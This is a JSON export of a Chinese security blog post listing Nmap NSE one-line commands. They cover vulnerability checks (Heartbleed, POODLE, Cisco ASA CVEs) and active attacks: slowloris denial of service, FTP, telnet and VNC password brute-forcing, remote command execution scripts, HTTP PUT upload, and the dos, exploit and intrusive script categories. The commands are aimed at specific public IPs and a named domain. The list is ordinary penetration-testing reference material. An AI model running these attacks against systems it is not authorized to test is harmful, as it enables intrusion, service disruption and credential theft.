{"id":409,"date":"2020-07-17T05:53:10","date_gmt":"2020-07-16T21:53:10","guid":{"rendered":"https:\/\/byy3.com\/?p=409"},"modified":"2020-07-17T05:53:10","modified_gmt":"2020-07-16T21:53:10","slug":"nmap%e6%89%ab%e6%8f%8f%e6%bc%8f%e6%b4%9e-%e6%96%b0%e7%94%a8%e6%b3%95","status":"publish","type":"post","link":"https:\/\/byy3.com\/?p=409","title":{"rendered":"Nmap\u626b\u63cf\u6f0f\u6d1e \u65b0\u7528\u6cd5"},"content":{"rendered":"\n<p class=\"wp-block-paragraph\">1 http \u62d2\u7edd\u670d\u52a1<br>nmap \u2013max-parallelism 800\u2013script http-slowloris scanme.nmap.org<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">2 IIS \u77ed\u6587\u4ef6\u6cc4\u9732<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">nmap -p 8080 \u2013script http-iis-short-name-brute 61.142.64.176<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">3 ftp\u5f31\u53e3\u4ee4\u66b4\u529b\u7834\u89e3<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">nmap \u2013script ftp-brute \u2013script-args brute.emptypass=true,ftp-brute.timeout=30,userdb=\/root\/dirtionary\/usernames.txt,brute.useraspass=true,passdb=\/root\/dirtionary\/passwords.txt,brute.threads=3,brute.delay=6 203.195.139.153<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">4 \u68c0\u6d4bCVE-2011-2523\u4e2d\u7684ftp-vsftpd-backdoor<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">nmap -T2 \u2013script ftp-vsftpd-backdoor 211.139.201.240<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">5 \u9a8c\u8bc1http\u4e2d\u5f00\u542f\u7684-methods \u65b9\u6cd5<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">nmap -T3 \u2013script http-methods \u2013script-args http.test-all=true,http.url-path=\/www.haoshangjia.com<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">6 \u9a8c\u8bc1HTTP.sys \u8fdc\u7a0b\u4ee3\u7801\u6267\u884c<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">nmap -sV \u2013script http-vuln-cve2015-1635 203.195.139.153<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">7\u9a8c\u8bc1 SSL POODLE information leak<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">nmap -sV -p 443 \u2013version-light \u2013script ssl-poodle 218.19.141.16<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">8 \u9a8c\u8bc1http \u4e2d\u5f00\u542f\u4e86put \u65b9\u6cd5<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">nmap \u2013script http-put \u2013script-args http-put.url=\/uploads\/testput.txt,http-put.file=\/root\/put.txt 218.19.141.16<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">9 \u9a8c\u8bc1mysql \u533f\u540d\u8bbf\u95ee<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">nmap \u2013script mysql-empty-password 203.195.139.153<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">10 \u9a8c\u8bc1cve2015-1427 \u6f0f\u6d1e<br>nmap \u2013script http-vuln-cve2015-1427 \u2013script-args command=ls 203.195.139.153<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">11 \u9a8c\u8bc1cve2014-8877\u6f0f\u6d1e<br>nmap -Pn \u2013script http-vuln-cve2014-8877 \u2013script-args http-vuln-cve2014-8877.cmd=dir,http-vuln-cve2014-8877.uri=\/wordpress 42.96.170.128<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">12 \u9a8c\u8bc1Cisco ASA\u4e2d\u7684CVE-2014-2126,CVE-2014-2127,CVE-2014-21,CVE-2014-2129\u6f0f\u6d1e<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">nmap -p 443 \u2013script http-vuln-cve2014-2126,http-vuln-cve2014-2127,http-vuln-cve2014-2128,http-vuln-cve2014-2129 203.195.139.153<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">13\u9a8c\u8bc1\u4f4e\u5b89\u5168\u7684 SSHv1\uff0csslv2\u534f\u8bae<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">nmap \u2013script sshv1,sslv2 www.haoshangjia.com<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">14 \u9a8c\u8bc1CVE-2014-0224 ssl-ccs-injection<br>nmap -Pn \u2013script ssl-ccs-injection 203.195.139.153<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">15 \u9a8c\u8bc1ssl-cert\u8bc1\u4e66\u95ee\u9898<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">nmap -v -v \u2013script ssl-cert 203.195.139.153<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">16\u9a8c\u8bc1SSL\u8bc1\u4e66\u7684\u6709\u9650\u671f<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">nmap -Pn \u2013script ssl-date www.haoshangjia.com<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">17 \u9a8c\u8bc1CVE-2014-0160 OpenSSL Heartbleed bug<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">nmap -p 443 \u2013script ssl-heartbleed,ssl-known-key 203.195.139.153<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">18 \u9a8c\u8bc1 Debian OpenSSL keys<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">nmap -p 443 \u2013script ssl-known-key 203.195.139.153<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">18 \u9a8c\u8bc1\u5f31\u52a0\u5bc6SSL\u5957\u4ef6<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">nmap \u2013script ssl-enum-ciphers 203.195.139.153<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">20 \u9a8c\u8bc1CVE 2015-4000<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">nmap \u2013script ssl-dh-params www.haoshangjia.com<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">21 \u9a8c\u8bc1\u591a\u79cdSSL\u6f0f\u6d1e\u95ee\u9898<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">nmap 203.195.139.153 \u2013vv \u2013script sshv1,ssl-ccs-injection,ssl-cert,ssl-date,ssl-dh-params,ssl-enum-ciphers,ssl-google-cert-catalog,ssl-heartbleed,ssl-known-key,sslv2<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">22 \u5728\u7f51\u7edc\u4e2d\u68c0\u6d4b\u67d0\u4e3b\u673a\u662f\u5426\u5b58\u5728\u7a83\u542c\u4ed6\u4eba\u6d41\u91cf<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">nmap \u2013script sniffer-detect 10.10.167.5<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">23 \u66b4\u529b\u7834\u89e3telnet<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">nmap -p 23 \u2013script telnet-brute \u2013script-args userdb=myusers.lst,passdb=mypwds.lst \u2013script-args telnet-brute.timeout=8s 203.195.139.153<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">24 \u9a8c\u8bc1telnet\u662f\u5426\u652f\u6301\u52a0\u5bc6<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">nmap \u2013script telnet-encryption 203.195.139.153<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">25 \u7cbe\u51c6\u5730\u786e\u8ba4\u7aef\u53e3\u4e0a\u8fd0\u884c\u7684\u670d\u52a1<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">nmap -sV \u2013script unusual-port 42.96.170.128<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">26 \u6536\u96c6VNC\u4fe1\u606f<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">nmap \u2013script vnc-info 203.195.139.153<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">27 \u66b4\u529b\u7834\u89e3VNC<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">nmap \u2013script vnc-brute \u2013script-args brute.guesses=6,brute.emptypass=true,userdb=\/root\/dictionary\/user.txt,brute.useraspass=true,passdb=\/root\/dictionary\/pass.txt,brute.retries=3,brute.threads=2,brute.delay=3 42.96.170.128<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u8fd9\u4e2a\u811a\u672c\u633a\u957f\u7684\uff0c\u5f88\u591a\u8be6\u7ec6\u7684\u53c2\u6570\uff0c\u8bf7\u53c2\u9605\u811a\u672c\u7684\u5177\u4f53\u53c2\u6570\u3002<br>0x03 \u4f7f\u7528\u7cfb\u5217\u7684nmap NSE \u8fdb\u884c\u68c0\u67e5<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">nmap\u811a\u672c\u4e3b\u8981\u5206\u4e3a\u4ee5\u4e0b\u51e0\u7c7b\uff0c\u5728\u626b\u63cf\u65f6\u53ef\u6839\u636e\u9700\u8981\u8bbe\u7f6e\u2013script=\u7c7b\u522b\u8fd9\u79cd\u65b9\u5f0f\u8fdb\u884c\u6bd4\u8f83\u7b3c\u7edf\u7684\u626b\u63cf\uff1a<br>auth: \u8d1f\u8d23\u5904\u7406\u9274\u6743\u8bc1\u4e66\uff08\u7ed5\u5f00\u9274\u6743\uff09\u7684\u811a\u672c<br>broadcast: \u5728\u5c40\u57df\u7f51\u5185\u63a2\u67e5\u66f4\u591a\u670d\u52a1\u5f00\u542f\u72b6\u51b5\uff0c\u5982dhcp\/dns\/sqlserver\u7b49\u670d\u52a1<br>brute: \u63d0\u4f9b\u66b4\u529b\u7834\u89e3\u65b9\u5f0f\uff0c\u9488\u5bf9\u5e38\u89c1\u7684\u5e94\u7528\u5982http\/snmp\u7b49<br>default: \u4f7f\u7528-sC\u6216-A\u9009\u9879\u626b\u63cf\u65f6\u5019\u9ed8\u8ba4\u7684\u811a\u672c\uff0c\u63d0\u4f9b\u57fa\u672c\u811a\u672c\u626b\u63cf\u80fd\u529b<br>discovery: \u5bf9\u7f51\u7edc\u8fdb\u884c\u66f4\u591a\u7684\u4fe1\u606f\uff0c\u5982SMB\u679a\u4e3e\u3001SNMP\u67e5\u8be2\u7b49<br>dos: \u7528\u4e8e\u8fdb\u884c\u62d2\u7edd\u670d\u52a1\u653b\u51fb<br>exploit: \u5229\u7528\u5df2\u77e5\u7684\u6f0f\u6d1e\u5165\u4fb5\u7cfb\u7edf<br>external: \u5229\u7528\u7b2c\u4e09\u65b9\u7684\u6570\u636e\u5e93\u6216\u8d44\u6e90\uff0c\u4f8b\u5982\u8fdb\u884cwhois\u89e3\u6790<br>fuzzer: \u6a21\u7cca\u6d4b\u8bd5\u7684\u811a\u672c\uff0c\u53d1\u9001\u5f02\u5e38\u7684\u5305\u5230\u76ee\u6807\u673a\uff0c\u63a2\u6d4b\u51fa\u6f5c\u5728\u6f0f\u6d1e<br>intrusive: \u5165\u4fb5\u6027\u7684\u811a\u672c\uff0c\u6b64\u7c7b\u811a\u672c\u53ef\u80fd\u5f15\u53d1\u5bf9\u65b9\u7684IDS\/IPS\u7684\u8bb0\u5f55\u6216\u5c4f\u853d<br>malware: \u63a2\u6d4b\u76ee\u6807\u673a\u662f\u5426\u611f\u67d3\u4e86\u75c5\u6bd2\u3001\u5f00\u542f\u4e86\u540e\u95e8\u7b49\u4fe1\u606f<br>safe: \u6b64\u7c7b\u4e0eintrusive\u76f8\u53cd\uff0c\u5c5e\u4e8e\u5b89\u5168\u6027\u811a\u672c<br>version: \u8d1f\u8d23\u589e\u5f3a\u670d\u52a1\u4e0e\u7248\u672c\u626b\u63cf\uff08Version Detection\uff09\u529f\u80fd\u7684\u811a\u672c<br>vuln: \u8d1f\u8d23\u68c0\u67e5\u76ee\u6807\u673a\u662f\u5426\u6709\u5e38\u89c1\u7684\u6f0f\u6d1e\uff08Vulnerability\uff09<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Nmap\u63d0\u4f9b\u7684\u811a\u672c\u547d\u4ee4\u884c\u53c2\u6570\u5982\u4e0b\uff1a<br>-sC: \u7b49\u4ef7\u4e8e\u2013script=default\uff0c\u4f7f\u7528\u9ed8\u8ba4\u7c7b\u522b\u7684\u811a\u672c\u8fdb\u884c\u626b\u63cf\u3002<br>\u2013script=: \u4f7f\u7528\u67d0\u4e2a\u6216\u67d0\u7c7b\u811a\u672c\u8fdb\u884c\u626b\u63cf\uff0c\u652f\u6301\u901a\u914d\u7b26\u63cf\u8ff0<br>\u2013script-args=<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">nmap \u2013sC 203.195.139.153<br>5 \u4f7f\u7528nmap \u8fdb\u884c\u4fe1\u606f\u6316\u6398<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">nmap \u2013script discovery 203.195.139.153<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">6 \u4f7f\u7528nmap \u8fdb\u884c\u62d2\u7edd\u670d\u52a1\u653b\u51fb<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">nmap \u2013script dos 203.195.139.153<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">7 \u4f7f\u7528nmap \u5229\u7528\u5df2\u77e5\u7684\u6f0f\u6d1e\u5165\u4fb5\u7cfb\u7edf<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">nmap \u2013script exploit 203.195.139.153<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">8 \u4f7f\u7528nmap \u8fdb\u884c\u5229\u7528\u7b2c\u4e09\u65b9\u7684\u6570\u636e\u5e93\u6216\u8d44\u6e90\u8fdb\u884c\u4fe1\u606f\u6536\u96c6\u6216\u8005\u653b\u51fb<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">nmap \u2013script external 203.195.139.153<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">9 \u4f7f\u7528nmap \u8fdb\u884c\u6a21\u7cca\u6d4b\u8bd5\uff0c\u53d1\u9001\u5f02\u5e38\u7684\u5305\u5230\u76ee\u6807\u673a\uff0c\u63a2\u6d4b\u51fa\u6f5c\u5728\u6f0f\u6d1e<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">nmap \u2013script fuzzer 203.195.139.153<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">10 \u4f7f\u7528nmap \u8fdb\u884c\u5165\u4fb5\uff0c\u6b64\u7c7b\u811a\u672c\u53ef\u80fd\u5f15\u53d1\u5bf9\u65b9\u7684IDS\/IPS\u7684\u8bb0\u5f55\u6216\u5c4f\u853d<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">nmap \u2013script intrusive 203.195.139.153<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">11 \u4f7f\u7528nmap \u63a2\u6d4b\u76ee\u6807\u673a\u662f\u5426\u611f\u67d3\u4e86\u75c5\u6bd2\u3001\u5f00\u542f\u4e86\u540e\u95e8\u7b49\u4fe1\u606f<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">nmap \u2013script malware 203.195.139.153<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">12 \u4f7f\u7528nmap \u5bf9\u7cfb\u7edf\u8fdb\u884c\u5b89\u5168\u68c0\u67e5<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">nmap \u2013script safe 203.195.139.153<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">13 \u4f7f\u7528nmap \u5bf9\u76ee\u6807\u673a\u8fdb\u884c\u68c0\u67e5\u662f\u5426\u5b58\u5728\u5e38\u89c1\u7684\u6f0f\u6d1e<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">nmap \u2013script vuln 203.195.139.153<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">14 \u4f7f\u7528nmap \u8d1f\u8d23\u589e\u5f3a\u670d\u52a1\u4e0e\u7248\u672c\u626b\u63cf\uff08Version Detection\uff09\u529f\u80fd\u7684\u811a\u672c<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">nmap \u2013script version 203.195.139.153<br>\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014<\/p>\n","protected":false},"excerpt":{"rendered":"<p>1 http \u62d2\u7edd\u670d\u52a1nmap \u2013max-parallelism 800\u2013script http-slowlo [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[],"class_list":["post-409","post","type-post","status-publish","format-standard","hentry","category-net-security"],"_links":{"self":[{"href":"https:\/\/byy3.com\/index.php?rest_route=\/wp\/v2\/posts\/409","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/byy3.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/byy3.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/byy3.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/byy3.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=409"}],"version-history":[{"count":0,"href":"https:\/\/byy3.com\/index.php?rest_route=\/wp\/v2\/posts\/409\/revisions"}],"wp:attachment":[{"href":"https:\/\/byy3.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=409"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/byy3.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=409"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/byy3.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=409"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}